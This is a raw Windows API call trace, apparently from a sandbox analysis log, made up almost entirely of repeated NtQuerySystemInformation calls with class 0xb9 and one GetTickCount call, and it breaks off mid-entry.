[0301.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f100, Length=0x20, ResultLength=0x0) [0301.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f080, Length=0x20, ResultLength=0x0) [0301.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f080, Length=0x20, ResultLength=0x0) [0301.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f080, Length=0x20, ResultLength=0x0) [0301.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2d0, Length=0x20, ResultLength=0x0) [0301.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x38, ResultLength=0x0) [0301.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1f0, Length=0x20, ResultLength=0x0) [0301.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f170, Length=0x20, ResultLength=0x0) [0301.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f170, Length=0x20, ResultLength=0x0) [0301.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f170, Length=0x20, ResultLength=0x0) [0301.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x38, ResultLength=0x0) [0301.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1f0, Length=0x20, ResultLength=0x0) [0301.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f170, Length=0x20, ResultLength=0x0) [0301.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f170, Length=0x20, ResultLength=0x0) [0301.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f170, Length=0x20, ResultLength=0x0) [0301.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f360, Length=0x38, ResultLength=0x0) [0301.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1f0, Length=0x20, ResultLength=0x0) [0301.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f180, Length=0x20, ResultLength=0x0) [0301.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f180, Length=0x20, ResultLength=0x0) [0301.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f480, Length=0x58, ResultLength=0x0) [0301.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3c0, Length=0x20, ResultLength=0x0) [0301.983] GetTickCount () returned 0x118b719 [0301.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f278, Length=0x58, ResultLength=0x0) [0301.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f190, Length=0x38, ResultLength=0x0) [0301.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efc0, Length=0x28, ResultLength=0x0) [0301.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efc0, Length=0x28, ResultLength=0x0) [0301.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efc0, Length=0x28, ResultLength=0x0) [0301.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efc0, Length=0x28, ResultLength=0x0) [0301.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x28, ResultLength=0x0) [0301.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f190, Length=0x38, ResultLength=0x0) [0301.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x28, ResultLength=0x0) [0301.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0301.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0b0, Length=0x28, ResultLength=0x0) [0302.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f190, Length=0x38, ResultLength=0x0) [0302.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x20, ResultLength=0x0) [0302.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef90, Length=0x20, ResultLength=0x0) [0302.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef90, Length=0x20, ResultLength=0x0) [0302.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef90, Length=0x20, ResultLength=0x0) [0302.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f190, Length=0x38, ResultLength=0x0) [0302.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f010, Length=0x20, ResultLength=0x0) [0302.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efa0, Length=0x20, ResultLength=0x0) [0302.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efa0, Length=0x20, ResultLength=0x0) [0302.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f278, Length=0x58, ResultLength=0x0) [0302.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0302.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef90, Length=0x28, ResultLength=0x0) [0302.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef90, Length=0x28, ResultLength=0x0) [0302.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef90, Length=0x28, ResultLength=0x0) [0302.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef90, Length=0x28, ResultLength=0x0) [0302.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f000, Length=0x28, ResultLength=0x0) [0302.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0302.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0302.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f080, Length=0x28, ResultLength=0x0) [0302.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f080, Length=0x28, ResultLength=0x0) [0302.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0302.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0302.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eef0, Length=0x20, ResultLength=0x0) [0302.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x20, ResultLength=0x0) [0302.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x20, ResultLength=0x0) [0302.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x20, ResultLength=0x0) [0302.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0c0, Length=0x20, ResultLength=0x0) [0302.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0302.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efe0, Length=0x20, ResultLength=0x0) [0302.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef60, Length=0x20, ResultLength=0x0) [0302.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef60, Length=0x20, ResultLength=0x0) [0302.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef60, Length=0x20, ResultLength=0x0) [0302.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0302.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efe0, Length=0x20, ResultLength=0x0) [0302.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef60, Length=0x20, ResultLength=0x0) [0302.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef60, Length=0x20, ResultLength=0x0) [0302.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef60, Length=0x20, ResultLength=0x0) [0302.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f150, Length=0x38, ResultLength=0x0) [0302.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efe0, Length=0x20, ResultLength=0x0) [0302.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef70, Length=0x20, ResultLength=0x0) [0302.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef70, Length=0x20, ResultLength=0x0) [0302.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f278, Length=0x58, ResultLength=0x0) [0302.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f140, Length=0x58, ResultLength=0x0) [0302.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f060, Length=0x38, ResultLength=0x0) [0302.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x28, ResultLength=0x0) [0302.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x28, ResultLength=0x0) [0302.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x28, ResultLength=0x0) [0302.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee90, Length=0x28, ResultLength=0x0) [0302.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef00, Length=0x28, ResultLength=0x0) [0302.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f060, Length=0x38, ResultLength=0x0) [0302.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef80, Length=0x28, ResultLength=0x0) [0302.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef80, Length=0x28, ResultLength=0x0) [0302.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f060, Length=0x38, ResultLength=0x0) [0302.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x20, ResultLength=0x0) [0302.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x20, ResultLength=0x0) [0302.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x20, ResultLength=0x0) [0302.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x20, ResultLength=0x0) [0302.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f060, Length=0x38, ResultLength=0x0) [0302.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x20, ResultLength=0x0) [0302.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x20, ResultLength=0x0) [0302.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x20, ResultLength=0x0) [0302.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0302.123] NtQuerySystemInformation 